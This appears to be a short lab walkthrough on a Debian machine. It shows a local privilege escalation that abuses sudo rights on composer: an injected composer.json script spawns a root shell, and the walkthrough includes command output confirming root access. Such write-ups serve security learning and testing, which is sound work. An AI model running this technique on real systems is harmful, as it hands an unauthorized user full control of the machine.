sudo composer
The skunk user has sudo privileges to execute the /usr/bin/composer --working-dir\=/var/www/html/lavita * command, which can be abused for privilege escalation.
www-data@debian:/var/www/html/lavita$ whoami
www-data
www-data@debian:/var/www/html/lavita$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > ./composer.jsonSince the --working-dir\=/var/www/html/lavita argument is fixed, I can modify the /var/www/html/lavita/composer.json file as the www-data account
skunk@debian:/var/www/html/lavita$ whoami
skunk
skunk@debian:/var/www/html/lavita$ sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]? yes
> /bin/sh -i 0<&3 1>&3 2>&3Then I can execute the sudo command as the skunk user.
The composer shows a warning and prompts for confirmation
# whoami
whoami
root
# hostname
hostname
debian
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:2c:5d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.201.38/24 brd 192.168.201.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:2c5d/64 scope link
valid_lft forever preferred_lft foreverSystem level compromise